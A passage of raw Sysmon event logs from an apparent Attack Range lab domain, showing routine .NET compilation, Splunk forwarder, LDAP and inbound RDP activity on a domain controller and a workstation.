14:57:56.154{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A50D-00000000BB01}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.029{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF4-607E-A40D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000076443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.706{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57543-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000076442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.706{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57543-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000076441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.052{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63230-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.014{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF4-607E-A40D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:56.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF4-607E-A40D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050387Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.681{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CE84E330AA2D23B7BD989D74CE4EADB,SHA256=54DEBE10C8BE181A5231802B72162004F9D23A1D1506BE02104B34F7F2306D16,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050386Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF4-607E-EB06-00000000BB01}2496C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050385Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050384Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050383Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050382Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050381Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050380Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050379Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050378Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050377Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050376Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBF4-607E-EB06-00000000BB01}2496C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050375Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.181{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF4-607E-EB06-00000000BB01}2496C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050374Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.182{85C0FFC9-EBF4-607E-EB06-00000000BB01}2496C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050373Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.493{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50228-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050372Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:53.028{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51702-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000076522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.811{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-BB0D-00000000BB01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.795{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-BA0D-00000000BB01}5260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.733{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-BA0D-00000000BB01}5260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.733{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-BA0D-00000000BB01}5260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft